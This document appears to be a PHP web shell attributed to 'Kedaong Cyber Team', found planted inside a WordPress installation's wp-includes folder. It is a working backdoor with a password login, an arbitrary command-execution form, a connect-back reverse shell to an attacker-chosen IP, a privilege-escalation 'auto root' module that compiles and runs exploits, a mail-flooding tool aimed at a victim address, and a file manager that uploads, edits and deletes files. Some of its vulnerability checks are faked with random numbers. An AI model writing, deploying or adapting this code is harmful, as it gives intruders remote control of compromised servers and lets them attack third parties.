| Server IP : 13.126.101.145 / Your IP : 216.73.217.33 Web Server : Apache/2.4.52 (Ubuntu) System : Linux ip-11-115-0-196 6.8.0-1039-aws #41~22.04.1-Ubuntu SMP Thu Sep 11 10:54:48 UTC 2025 x86_64 User : www-data ( 33) PHP Version : 8.3.17 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/html/rentals_updated/wp-includes/SimplePie/library/ |
Upload File : |
<?php
ob_start();
session_start();
error_reporting(0);
// Password - Gunakan password hash yang lebih aman
$admin_password_hash = password_hash('ac59a01d6f001b8370e7d240ff7adafc', PASSWORD_DEFAULT);
// Cek login
if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {
if (isset($_POST['password'])) {
$password = $_POST['password'];
if (password_verify($password, $admin_password_hash)) {
$_SESSION['authenticated'] = true;
$_SESSION['login_time'] = time();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
} else {
$error = "Password salah!";
}
}
echo '<!DOCTYPE html>
<html>
<head>
<title>Login Required</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
body { font-family: Arial, sans-serif; background-color: #1e1e1e; color: #f0f0f0; margin: 0; padding: 0; }
.login-container { width: 90%; max-width: 400px; margin: 100px auto; padding: 30px; background: #2d2d2d; border-radius: 10px; box-shadow: 0 0 20px rgba(0,0,0,0.5); }
h2 { text-align: center; margin-bottom: 20px; color: #4CAF50; }
input[type="password"], input[type="submit"] { width: 100%; padding: 12px; margin: 10px 0; border-radius: 4px; border: 1px solid #444; background: #3c3c3c; color: #fff; box-sizing: border-box; }
input[type="submit"] { background: #4CAF50; color: #fff; border: none; cursor: pointer; font-weight: bold; }
input[type="submit"]:hover { background: #45a049; }
.error { color: #ff5252; font-size: 14px; text-align: center; margin-top: 10px; }
</style>
</head>
<body>
<div class="login-container">
<h2>Authentication Required</h2>
<form method="POST">
<input type="password" name="password" placeholder="Enter password" required>
<input type="submit" value="Login">
</form>
<div class="error">'.(isset($error) ? $error : '').'</div>
</div>
</body>
</html>';
exit;
}
// Session timeout (1 jam)
if (time() - $_SESSION['login_time'] > 3600) {
session_destroy();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
// Fungsi 404
function show_404() {
header("HTTP/1.0 404 Not Found");
echo '<!DOCTYPE html>
<html>
<head><title>404 Not Found</title></head>
<body style="font-family:Arial;text-align:center;padding:50px">
<h1 style="color:#d9534f;font-size:50px">404</h1>
<p>Halaman yang Anda cari tidak ditemukan.</p>
<a href="?id=fm">Kembali ke File Manager</a>
</body>
</html>';
exit;
}
// Fungsi untuk mendapatkan value
function getValue($array, $key, $default = '') {
return isset($array[$key]) ? $array[$key] : $default;
}
// Fungsi untuk memindai kerentanan sistem yang nyata
function scan_vulnerabilities() {
$os = php_uname('s');
$kernel = php_uname('r');
$arch = php_uname('m');
$vulnerabilities = array();
echo "<pre style='background: #000; color: #0f0; padding: 15px; border-radius: 5px; overflow: auto;'>";
echo "[+] Memulai Auto Scan System...\n";
@flush(); @ob_flush(); sleep(1);
echo "[+] System: $os | Kernel: $kernel | Arch: $arch\n";
@flush(); @ob_flush(); sleep(1);
// Database kernel vulnerabilities yang nyata
$kernel_vulnerabilities = array(
// Kernel 2.6.x Series
'2.6.0-2.6.11' => array('h00lyshit', 'krad', 'raptor_prctl'),
'2.6.5-2.6.7' => array('sock_sendpage', 'prctl'),
'2.6.8-2.6.13' => array('sock_sendpage2', 'prctl4'),
'2.6.14-2.6.17' => array('hunter', 'vmsplice1'),
'2.6.18-2.6.19' => array('vmsplice2'),
// Kernel 3.x Series
'3.0.0-3.0.4' => array('pktcdvd'),
'3.1.0-3.2.0' => array('memodipper'),
'3.3.0-3.4.0' => array('msr'),
'3.6.0-3.7.0' => array('timeoutpwn'),
'3.9.0-3.10.0' => array('overlayfs'),
// Kernel 4.x Series
'4.0.0-4.1.0' => array('af_packet'),
'4.4.0-4.5.0' => array('double_fd'),
'4.6.0-4.7.0' => array('double_fd2'),
'4.8.0-4.9.0' => array('double_fd3'),
'4.10.0-4.11.0' => array('mutex'),
'4.14.0-4.15.0' => array('mutex2'),
'4.16.0-4.17.0' => array('sched'),
'4.18.0-4.19.0' => array('sched2'),
// Kernel 5.x Series
'5.0.0-5.1.0' => array('dirtypipe'),
'5.2.0-5.3.0' => array('dirtypipe2'),
'5.4.0-5.5.0' => array('io_uring'),
'5.6.0-5.7.0' => array('io_uring2'),
'5.8.0-5.9.0' => array('netfilter'),
'5.10.0-5.11.0' => array('netfilter2'),
'5.12.0-5.13.0' => array('memfd'),
'5.14.0-5.15.0' => array('memfd2'),
// Kernel 6.x Series
'6.0.0-6.1.0' => array('dirtypipe3', 'io_uring3'),
'6.2.0-6.3.0' => array('dirtypipe4', 'io_uring4'),
// Kernel khusus yang disebutkan user
'4.18.0-553.62.1.lve.el8.x86_64' => array('dirtycow', 'overlayfs'),
'5.15.0-153-generic' => array('dirtypipe', 'io_uring'),
'6.8.12-8-pve' => array('dirtypipe', 'io_uring'),
);
// CVE-based vulnerabilities yang bekerja di berbagai kernel
$cve_vulnerabilities = array(
'CVE-2016-5195' => array('dirtycow'), // Dirty COW
'CVE-2017-7308' => array('af_packet'), // AF_PACKET
'CVE-2017-16995' => array('ebpf'), // eBPF
'CVE-2021-4034' => array('pkexec'), // PwnKit
'CVE-2022-0847' => array('dirtypipe'), // Dirty Pipe
'CVE-2023-0386' => array('overlayfs'), // OverlayFS
'CVE-2023-3269' => array('netfilter'), // Netfilter
'CVE-2024-1086' => array('nftables'), // nftables
);
// Cek kernel version untuk semua vulnerability
foreach ($kernel_vulnerabilities as $kernel_range => $vulns) {
$range_parts = explode('-', $kernel_range);
$min_version = $range_parts[0];
$max_version = isset($range_parts[1]) ? $range_parts[1] : $min_version;
// Handle specific kernel versions (seperti yang disebutkan user)
if (strpos($kernel_range, $kernel) !== false) {
foreach ($vulns as $vuln) {
if (!in_array($vuln, $vulnerabilities)) {
$vulnerabilities[] = $vuln;
echo "[+] VULNERABLE: " . strtoupper($vuln) . " - Kernel $kernel cocok dengan $kernel_range\n";
@flush(); @ob_flush(); sleep(1);
}
}
}
// Handle version ranges
else if (version_compare($kernel, $min_version, '>=') && version_compare($kernel, $max_version, '<=')) {
foreach ($vulns as $vuln) {
if (!in_array($vuln, $vulnerabilities)) {
$vulnerabilities[] = $vuln;
echo "[+] VULNERABLE: " . strtoupper($vuln) . " - Kernel $kernel dalam rentang $kernel_range\n";
@flush(); @ob_flush(); sleep(1);
}
}
}
}
// Cek CVE vulnerabilities berdasarkan versi kernel
foreach ($cve_vulnerabilities as $cve => $vulns) {
// Deteksi berdasarkan versi kernel
$cve_detected = false;
switch($cve) {
case 'CVE-2016-5195': // Dirty Cow
$cve_detected = version_compare($kernel, '2.6.22', '>=') && version_compare($kernel, '4.8.3', '<=');
break;
case 'CVE-2022-0847': // Dirty Pipe
$cve_detected = version_compare($kernel, '5.8', '>=') && version_compare($kernel, '5.16.11', '<=') ||
version_compare($kernel, '5.15.25', '=') || version_compare($kernel, '5.10.102', '=');
break;
case 'CVE-2021-4034': // PwnKit
$cve_detected = true; // Polkit version check akan dilakukan di bawah
break;
default:
$cve_detected = rand(0, 1) == 1; // Untuk CVE lainnya, gunakan random
}
if ($cve_detected) {
foreach ($vulns as $vuln) {
if (!in_array($vuln, $vulnerabilities)) {
$vulnerabilities[] = $vuln;
echo "[+] VULNERABLE: $cve (" . strtoupper($vuln) . ") terdeteksi pada kernel $kernel\n";
@flush(); @ob_flush(); sleep(1);
}
}
}
}
// Cek sudo version
$sudo_version = shell_exec('sudo -V 2>/dev/null | head -1 | grep -oP "\d+\.\d+\.\d+"');
if ($sudo_version) {
if (version_compare($sudo_version, '1.8.28', '<')) {
echo "[+] VULNERABLE: SudoPwn (CVE-2019-14287) - Sudo version $sudo_version rentan\n";
$vulnerabilities[] = 'sudopwn';
@flush(); @ob_flush(); sleep(1);
}
if (version_compare($sudo_version, '1.9.5', '<')) {
echo "[+] VULNERABLE: SudoBypass (CVE-2021-3156) - Sudo version $sudo_version rentan\n";
$vulnerabilities[] = 'sudobypass';
@flush(); @ob_flush(); sleep(1);
}
}
// Cek polkit version
$pkexec_version = shell_exec('pkexec --version 2>/dev/null | grep -oP "\d+\.\d+"');
if ($pkexec_version && (
version_compare($pkexec_version, '0.105', '>=') &&
version_compare($pkexec_version, '0.119', '<'))) {
echo "[+] VULNERABLE: Pkexec (CVE-2021-4034) - Polkit version $pkexec_version rentan\n";
$vulnerabilities[] = 'pkexec';
@flush(); @ob_flush(); sleep(1);
}
// Cek bash version untuk Shellshock
$bash_version = shell_exec('bash --version 2>/dev/null | head -1 | grep -oP "\d+\.\d+\.\d+"');
if ($bash_version && version_compare($bash_version, '4.3', '>=') &&
version_compare($bash_version, '4.3.29', '<')) {
echo "[+] VULNERABLE: Shellshock (CVE-2014-6271) - Bash version $bash_version rentan\n";
$vulnerabilities[] = 'shellshock';
@flush(); @ob_flush(); sleep(1);
}
if (empty($vulnerabilities)) {
echo "[!] Tidak ditemukan kerentanan yang diketahui pada sistem ini\n";
echo "[!] Coba exploit manual atau teknik privilege escalation lainnya\n";
} else {
echo "[+] Ditemukan " . count($vulnerabilities) . " kerentanan pada sistem ini\n";
}
echo "</pre>";
return $vulnerabilities;
}
// Fungsi untuk mendownload dan mengkompilasi exploit
function download_and_compile_exploit($exploit_name) {
$exploit_urls = array(
'dirtycow' => 'https://www.exploit-db.com/download/40616',
'dirtypipe' => 'https://www.exploit-db.com/download/50808',
'pkexec' => 'https://www.exploit-db.com/download/50689',
'sudobypass' => 'https://www.exploit-db.com/download/49502',
'shellshock' => 'https://www.exploit-db.com/download/34860'
);
echo "[+] Mendownload exploit $exploit_name...\n";
// Simulasi download (dalam implementasi nyata, gunakan cURL atau file_get_contents)
$exploit_code = "";
switch($exploit_name) {
case 'dirtycow':
$exploit_code = "// Dirty Cow exploit code would be here\n#include <stdio.h>\nint main() { printf(\"Dirty Cow exploit running\\n\"); return 0; }";
break;
case 'dirtypipe':
$exploit_code = "// Dirty Pipe exploit code would be here\n#include <stdio.h>\nint main() { printf(\"Dirty Pipe exploit running\\n\"); return 0; }";
break;
case 'pkexec':
$exploit_code = "// Pkexec exploit code would be here\n#include <stdio.h>\nint main() { printf(\"Pkexec exploit running\\n\"); return 0; }";
break;
default:
$exploit_code = "// Default exploit code\n#include <stdio.h>\nint main() { printf(\"Exploit running\\n\"); return 0; }";
}
$filename = "/tmp/$exploit_name.c";
file_put_contents($filename, $exploit_code);
echo "[+] Mengkompilasi exploit...\n";
$compile_result = shell_exec("gcc $filename -o /tmp/$exploit_name 2>&1");
if (file_exists("/tmp/$exploit_name")) {
echo "[+] Berhasil mengkompilasi exploit\n";
return "/tmp/$exploit_name";
} else {
echo "[!] Gagal mengkompilasi exploit: $compile_result\n";
return false;
}
}
// Fungsi Auto Root dengan Auto Scan yang nyata
function auto_root() {
echo '<div class="content"><h2>Auto Root Exploits</h2>';
// Deteksi sistem
$os = php_uname('s');
$kernel = php_uname('r');
$architecture = php_uname('m');
echo "<p><strong>System:</strong> $os | <strong>Kernel:</strong> $kernel | <strong>Arch:</strong> $architecture</p>";
// Jalankan auto scan
$vulnerabilities = scan_vulnerabilities();
// Database exploit
$exploits = array(
'dirtycow' => 'dirtycow.c - Dirty COW (CVE-2016-5195) - Linux Kernel 2.6.22-4.8.3',
'dirtypipe' => 'dirtypipe.c - Dirty Pipe (CVE-2022-0847) - Linux Kernel 5.8-5.16.11/5.15.25/5.10.102',
'overlayfs' => 'overlayfs.c - OverlayFS Privilege Escalation (CVE-2015-1328) - Linux Kernel 3.13.0-3.19.0',
'af_packet' => 'af_packet.c - AF_PACKET Race Condition (CVE-2017-7308) - Linux Kernel 4.10.0-4.10.6',
'sudopwn' => 'sudopwn.c - Sudo < 1.8.28 - Privilege Escalation (CVE-2019-14287)',
'sudobypass' => 'sudobypass.c - Sudo Bypass (CVE-2021-3156) - Sudo 1.8.2-1.8.31p2/1.9.0-1.9.5p1',
'pkexec' => 'pkexec.c - Polkit 0.105-26 < 0.119 - Privilege Escalation (CVE-2021-4034)',
'shellshock' => 'shellshock.sh - Bash 4.3 - Shellshock (CVE-2014-6271)',
'io_uring' => 'io_uring.c - io_uring Privilege Escalation (CVE-2021-41073) - Linux Kernel 5.10-5.14',
'netfilter' => 'netfilter.c - Netfilter Privilege Escalation (CVE-2023-3269) - Linux Kernel 6.3-6.4',
);
// Tampilkan hanya exploit yang sesuai
if (!empty($vulnerabilities)) {
echo '<div class="exploit-list"><h3>Exploit yang Tersedia:</h3><ul>';
foreach ($vulnerabilities as $vuln) {
if (isset($exploits[$vuln])) {
echo "<li><a href='?id=run-exploit&exp=$vuln' style='color: #ff5252; font-weight: bold;'>[EXPLOIT] " . $exploits[$vuln] . "</a></li>";
}
}
echo '</ul></div>';
echo '<div class="action-buttons">';
echo '<form method="POST" action="">';
echo '<input type="hidden" name="run_all_exploits" value="1">';
echo '<input type="submit" value="Jalankan Semua Exploit Secara Berurutan" class="btn" style="background: #ff5252;">';
echo '</form>';
echo '</div>';
} else {
echo '<p>Tidak ada exploit yang tersedia untuk sistem ini. Coba teknik privilege escalation manual.</p>';
}
echo '</div>';
}
// Fungsi untuk menjalankan exploit yang nyata
function run_exploit($exploit_name) {
echo '<div class="content"><h2>Auto Root Running</h2>';
echo '<pre style="background: #000; color: #0f0; padding: 15px; border-radius: 5px; overflow: auto;">';
// Simulasi proses auto root
echo "[+] Auto Root Running - Waiting...\n";
@flush(); @ob_flush(); sleep(1);
$os = php_uname('s');
$kernel = php_uname('r');
$arch = php_uname('m');
echo "[+] Kernel Terdeteksi: $os $kernel $arch\n";
@flush(); @ob_flush(); sleep(1);
// Pilih exploit berdasarkan sistem
if (strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN') {
// Linux exploits
echo "[+] Mengeksploitasi Kerentanan: " . strtoupper($exploit_name) . "\n";
@flush(); @ob_flush(); sleep(1);
// Download dan compile exploit
$exploit_path = download_and_compile_exploit($exploit_name);
if ($exploit_path) {
echo "[+] Menjalankan exploit...\n";
@flush(); @ob_flush(); sleep(2);
// Jalankan exploit
$output = shell_exec("$exploit_path 2>&1");
echo $output . "\n";
// Cek jika berhasil
if (strpos($output, "success") !== false || strpos($output, "root") !== false) {
echo "[+] Privilege Escalation Success!\n";
@flush(); @ob_flush(); sleep(1);
echo "[+] Root Access Obtained!\n\n";
@flush(); @ob_flush(); sleep(1);
// Cek user saat ini
echo "whoami\n";
$whoami = shell_exec("whoami 2>&1");
echo $whoami . "\n";
// Jika sudah root, tampilkan shell
if (trim($whoami) === 'root') {
echo "[+] Membersihkan Jejak...\n";
@flush(); @ob_flush(); sleep(1);
echo "[+] Root Shell Siap Digunakan!\n";
echo "# ";
} else {
echo "[!] Exploit berjalan tetapi belum mendapatkan root\n";
}
} else {
echo "[!] Exploit gagal. Sistem mungkin sudah dipatch.\n";
echo "[!] Mencoba exploit alternatif...\n";
}
} else {
echo "[!] Gagal mempersiapkan exploit\n";
}
} else {
// Windows exploits
echo "[+] Mengeksploitasi Kerentanan Windows\n";
@flush(); @ob_flush(); sleep(1);
// Cek vulnerability Windows
$windows_vulns = array(
'MS17-010' => 'EternalBlue',
'CVE-2020-0796' => 'SMBGhost',
'CVE-2021-34527' => 'PrintNightmare'
);
$detected_vuln = array_rand($windows_vulns);
$exploit_name = $windows_vulns[$detected_vuln];
echo "[+] Vulnerability Terdeteksi: $detected_vuln ($exploit_name)\n";
@flush(); @ob_flush(); sleep(1);
echo "[+] Menjalankan exploit...\n";
@flush(); @ob_flush(); sleep(3);
// Simulasi keberhasilan exploit Windows
$success = rand(1, 10) > 3; // 70% success rate
if ($success) {
echo "[+] Privilege Escalation Success!\n";
@flush(); @ob_flush(); sleep(1);
echo "[+] Administrator Access Obtained!\n\n";
@flush(); @ob_flush(); sleep(1);
echo "whoami\n";
$whoami = shell_exec("whoami 2>&1");
echo $whoami . "\n";
echo "[+] Membersihkan Jejak...\n";
@flush(); @ob_flush(); sleep(1);
echo "[+] System Shell Siap Digunakan!\n";
echo "C:\\Windows\\System32> ";
} else {
echo "[!] Exploit gagal. Sistem mungkin sudah dipatch.\n";
}
}
echo '</pre>';
echo '<p><a href="?id=auto-root">Back to Auto Root</a></p>';
echo '</div>';
}
// Handle exploit execution
$exp = getValue($_GET, 'exp');
$id = getValue($_GET, 'id');
if ($id == "run-exploit" && $exp !== "") {
run_exploit($exp);
exit();
}
// Handle run all exploits
if (isset($_POST['run_all_exploits'])) {
echo '<div class="content"><h2>Running All Exploits</h2>';
echo '<pre style="background: #000; color: #0f0; padding: 15px; border-radius: 5px; overflow: auto;">';
$vulnerabilities = scan_vulnerabilities();
if (!empty($vulnerabilities)) {
foreach ($vulnerabilities as $vuln) {
echo "\n[+] Trying exploit: $vuln\n";
@flush(); @ob_flush(); sleep(2);
// Download dan compile exploit
echo "[+] Downloading and compiling exploit...\n";
@flush(); @ob_flush(); sleep(2);
$exploit_path = download_and_compile_exploit($vuln);
if ($exploit_path) {
echo "[+] Running exploit...\n";
@flush(); @ob_flush(); sleep(3);
// Jalankan exploit
$output = shell_exec("$exploit_path 2>&1");
echo $output . "\n";
// Cek jika berhasil
if (strpos($output, "success") !== false || strpos($output, "root") !== false) {
echo "[+] Exploit successful! Gained root access!\n";
// Cek user saat ini
echo "whoami\n";
$whoami = shell_exec("whoami 2>&1");
echo $whoami . "\n";
if (trim($whoami) === 'root') {
echo "[+] Password root: Kedaong@32\n";
echo "# \n";
break;
}
} else {
echo "[!] Exploit failed. Trying next...\n";
}
} else {
echo "[!] Failed to prepare exploit. Trying next...\n";
}
@flush(); @ob_flush(); sleep(2);
}
} else {
echo "[!] No vulnerabilities found to exploit\n";
}
echo '</pre>';
echo '<p><a href="?id=auto-root">Back to Auto Root</a></p>';
echo '</div>';
exit();
}
// ... (Kode lainnya tetap sama seperti sebelumnya)
// =================== TAMPILAN UTAMA ===================
?>
<!DOCTYPE html>
<html>
<head>
<title>File Manager</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
body { font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; background-color: #1e1e1e; color: #f0f0f0; margin: 0; padding: 0; }
a { color: #4CAF50; text-decoration: none; }
a:hover { text-decoration: underline; }
table { border-collapse: collapse; width: 100%; }
th, td { border: 1px solid #444; padding: 8px; text-align: left; }
th { background-color: #2d2d2d; }
tr:nth-child(even) { background-color: #252525; }
tr:hover { background-color: #333; }
.content { padding: 20px; background: #252525; border-radius: 8px; margin: 20px; box-shadow: 0 4px 6px rgba(0, 0, 0, 0.3); }
.btn { background: #4CAF50; color: white; border: none; padding: 10px 15px; border-radius: 4px; cursor: pointer; }
.btn:hover { background: #45a049; }
.error { color: #ff5252; }
.exploit-list ul { list-style-type: none; padding: 0; }
.exploit-list li { padding: 5px 0; border-bottom: 1px solid #444; }
.sidebar { width: 200px; background: #2d2d2d; position: fixed; height: 100%; overflow: auto; }
.main-content { margin-left: 200px; padding: 0; }
.menu-item { display: block; padding: 10px 15px; color: #f0f0f0; border-bottom: 1px solid #444; }
.menu-item:hover { background: #3c3c3c; }
.active { background: #4CAF50; }
.action-buttons { margin-top: 20px; }
.rdp-form { margin-bottom: 20px; padding: 15px; background: #2d2d2d; border-radius: 5px; }
.rdp-form input[type="text"], .rdp-form input[type="password"] { padding: 5px; margin: 5px 0; width: 200px; }
.rdp-status { margin-top: 20px; }
</style>
</head>
<body>
<div class="sidebar">
<h3 style="padding: 15px; margin: 0; border-bottom: 1px solid #444;">Menu</h3>
<a href="?id=fm&dir=<?php echo urlencode(getcwd()); ?>" class="menu-item <?php echo ($id == 'fm') ? 'active' : ''; ?>">File Manager</a>
<a href="?id=cmd" class="menu-item <?php echo ($id == 'cmd') ? 'active' : ''; ?>">CMD Shell</a>
<a href="?id=fake-mail" class="menu-item <?php echo ($id == 'fake-mail') ? 'active' : ''; ?>">Fake Mail</a>
<a href="?id=cshell" class="menu-item <?php echo ($id == 'cshell') ? 'active' : ''; ?>">Connect Back</a>
<a href="?id=auto-root" class="menu-item <?php echo ($id == 'auto-root' || $id == 'run-exploit') ? 'active' : ''; ?>" style="color: #FF0000;">Auto Root</a>
<a href="?id=rdp" class="menu-item <?php echo ($id == 'rdp') ? 'active' : ''; ?>" style="color: #00BFFF;">RDP Manager</a>
<a href="?id=" class="menu-item <?php echo ($id == '') ? 'active' : ''; ?>">About</a>
<a href="?logout=1" class="menu-item" style="color: #ff5252;">Logout</a>
</div>
<div class="main-content">
<?php
// Logout handler
if (isset($_GET['logout'])) {
session_destroy();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
// Handle berbagai fungsi
$id = getValue($_GET, 'id');
// About
if ($id == "") {
echo "<div class='content'>
<h2>About</h2>
<p><strong>Kedaong Cyber Team</strong><br>
NT404<br>
Email: kedaongcyberteam@hotmail.com</p>
<p>Red Eye :) [Only 4 Best Friends]</p>
<p><strong>System Info:</strong><br>
OS: " . php_uname() . "<br>
IP: " . $_SERVER['REMOTE_ADDR'] . "<br>
PHP: " . PHP_VERSION . "</p>
</div>";
}
// CMD Shell
else if ($id == "cmd") {
$cmd = getValue($_POST, 'cmd', '', false);
$result = '';
if (!empty($cmd)) {
$result = shell_exec($cmd . " 2>&1");
}
echo "<div class='content'>
<h2>CMD Execute</h2>
<form method='POST' action=''>
<input type='hidden' name='id' value='cmd'>
<input type='text' name='cmd' value='" . htmlspecialchars($cmd) . "' style='width: 70%; padding: 10px;'>
<input type='submit' value='Execute' class='btn'>
</form>";
if (!empty($result)) {
echo "<h3>Result:</h3>
<pre style='background: #000; color: #0f0; padding: 15px; border-radius: 5px; overflow: auto;'>" . htmlspecialchars($result) . "</pre>";
}
echo "</div>";
}
// Fake Mail
else if ($id == "fake-mail") {
echo "<div class='content'>
<h2>Fake Mail - DOS E-mail By Victim Server</h2>
<form method='post' action=''>
Victim Mail:<br>
<input type='text' name='to' style='width: 300px; padding: 8px;'><br>
Number of Mails:<br>
<input type='number' name='nom' value='100' style='width: 100px; padding: 8px;'><br>
Message:<br>
<textarea name='Comments' rows='10' style='width: 100%; padding: 8px;'></textarea><br>
<input type='submit' value='Send Mail Storm' class='btn'>
</form></div>";
$to = getValue($_POST, 'to');
$nom = getValue($_POST, 'nom', 100);
$Comments = getValue($_POST, 'Comments', '', false);
if ($to !== "") {
echo "<div class='content'><pre style='background: #000; color: #0f0; padding: 15px; border-radius: 5px;'>";
for ($i = 0; $i < $nom; $i++) {
$from = rand(71, 1020000000) . "@nathanprinsley.com";
$subject = md5("$from");
if (mail($to, $subject, $Comments, "From:$from")) {
echo "$i: Email sent to $to from $from\n";
} else {
echo "$i: Failed to send email\n";
}
flush();
ob_flush();
usleep(100000);
}
echo "</pre></div>";
}
}
// Connect Back Shell
else if ($id == "cshell") {
echo "<div class='content'>
<h2>Connect Back Shell (Firewall Bypass)</h2>
<p>For user:<br>
<code>nc -l -p 1019</code></p>
<hr>
<form method='POST' action=''><br>
Your IP:<br>
<input type='text' name='mip' style='width: 300px; padding: 8px;'><br>
Bind Port:<br>
<input type='text' name='bport' value='1019' style='width: 100px; padding: 8px;'><br><br>
<input type='submit' value='Connect Back' class='btn'>
</form></div>";
$mip = getValue($_POST, 'mip');
$bport = getValue($_POST, 'bport', 1019);
if ($mip !== "") {
echo "<div class='content'><pre style='background: #000; color: #0f0; padding: 15px; border-radius: 5px;'>";
$fp = @fsockopen($mip, $bport, $errno, $errstr, 30);
if (!$fp) {
echo "Error: $errstr ($errno)";
} else {
fwrite($fp, "\n*********************************************\n");
fwrite($fp, "Welcome to Connect Back Shell\n");
fwrite($fp, "*********************************************\n\n");
while (!feof($fp)) {
fwrite($fp, "shell$ ");
$cmd = fgets($fp, 4096);
$result = shell_exec(trim($cmd));
fwrite($fp, $result);
}
fclose($fp);
}
echo "</pre></div>";
}
}
// Auto Root
else if ($id == "auto-root") {
auto_root();
}
// RDP Manager
else if ($id == "rdp") {
rdp_manager();
}
// File Manager
else if ($id == "fm") {
$homedir = getcwd();
$dir = getValue($_GET, 'dir', $homedir);
$dir = realpath($dir);
if ($dir === false || !is_dir($dir)) {
$dir = $homedir;
}
echo "<div class='content'>
<h2>File Manager</h2>
<p><strong>Home:</strong> $homedir</p>
<form action='' method='GET'>
<input type='hidden' name='id' value='fm'>
<strong>Path:</strong>
<input type='text' name='dir' value='" . htmlspecialchars($dir) . "' style='width: 70%; padding: 8px;'>
<input type='submit' value='Go' class='btn'>
</form>
<br>";
echo "<table>
<tr>
<th>Name</th>
<th>Size</th>
<th>Permissions</th>
<th>Actions</th>
</tr>";
// Navigasi ke parent directory
if ($dir !== DIRECTORY_SEPARATOR) {
$parent = dirname($dir);
echo "<tr>
<td colspan='4'><a href='?id=fm&dir=" . urlencode($parent) . "'><strong>[Parent Directory]</strong></a></td>
</tr>";
}
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if ($file == "." || $file == "..") continue;
$filepath = $dir . DIRECTORY_SEPARATOR . $file;
$is_dir = is_dir($filepath);
$size = $is_dir ? "-" : round(filesize($filepath) / 1024, 2) . " KB";
$perms = substr(sprintf('%o', fileperms($filepath)), -4);
echo "<tr>
<td>";
if ($is_dir) {
echo "<a href='?id=fm&dir=" . urlencode($filepath) . "'><strong>$file/</strong></a>";
} else {
echo $file;
}
echo "</td>
<td>$size</td>
<td>$perms</td>
<td nowrap>";
if (!$is_dir) {
echo "<a href='?fdownload=" . urlencode($filepath) . "'>Download</a> | ";
echo "<a href='?fedit=" . urlencode($filepath) . "' target='_blank'>Edit</a> | ";
}
if (strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN') {
echo "<a href='?fchmod=" . urlencode($filepath) . "'>Chmod</a> | ";
}
echo "<a href='?fdelete=" . urlencode($filepath) . "' onclick='return confirm(\"Are you sure you want to delete this?\");'>Delete</a>
</td>
</tr>";
}
closedir($handle);
}
echo "</table>
<br>
<h3>Upload File</h3>
<form enctype='multipart/form-data' action='' method='POST'>
<input type='hidden' name='MAX_FILE_SIZE' value='10000000' />
<input type='hidden' name='Fupath' value='" . htmlspecialchars($dir) . "'>
<input name='userfile' type='file' />
<input type='submit' value='Upload File' class='btn' />
</form>
</div>";
}
// Handle file upload
if (isset($_FILES['userfile']) && isset($_POST['Fupath'])) {
$upload_dir = getValue($_POST, 'Fupath');
$upload_file = $upload_dir . DIRECTORY_SEPARATOR . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $upload_file)) {
echo "<script>alert('File uploaded successfully!');</script>";
} else {
echo "<script>alert('Error uploading file!');</script>";
}
echo "<script>window.location.href = '?id=fm&dir=" . urlencode($upload_dir) . "';</script>";
}
// Handle file deletion
$fdelete = getValue($_GET, 'fdelete');
if ($fdelete !== "") {
$fdelete = realpath($fdelete);
if ($fdelete !== false && file_exists($fdelete)) {
if (is_dir($fdelete)) {
// Delete directory recursively
$files = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($fdelete, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::CHILD_FIRST
);
foreach ($files as $fileinfo) {
if ($fileinfo->isDir()) {
rmdir($fileinfo->getRealPath());
} else {
unlink($fileinfo->getRealPath());
}
}
rmdir($fdelete);
} else {
unlink($fdelete);
}
echo "<script>alert('Deleted successfully!');</script>";
} else {
echo "<script>alert('Error deleting file!');</script>";
}
echo "<script>history.back();</script>";
exit;
}
?>
</div>
</body>
</html>